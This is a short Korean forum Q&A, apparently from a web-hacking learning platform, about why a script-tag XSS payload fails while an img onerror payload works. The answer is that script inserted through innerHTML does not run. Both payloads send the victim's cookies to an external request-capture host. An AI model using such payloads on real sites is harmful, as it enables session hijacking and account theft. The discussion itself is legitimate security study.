완료됨
img태그와 script태그
index.php/?page=vuln¶m=<img src=@ onerror=location.href="https://mlimzqc.request.dreamhack.games/"%2bdocument.cookie> 이건 드림핵 강의에서 제공한 img태그를 사용한 페이로드입니다
index.php/?page=vuln¶m=<script>location.href="https://mlimzqc.request.dreamhack.games/"%2bdocument.cookie;</script>
이건 제가 입력한 script태그를 이용한 페이로드입니다
img태그는 requestbin으로 요청이 가는데 script태그를 사용하면 요청이 가지 않습니다 무엇이 문제인가요..?
#web
답변
1
limelee
웹해킹 초심자
innerHTML에 삽입된 <script> 태그는 실행되지 않습니다.
https://developer.mozilla.org/ko/docs/Web/API/Element/innerHTML#security_considerations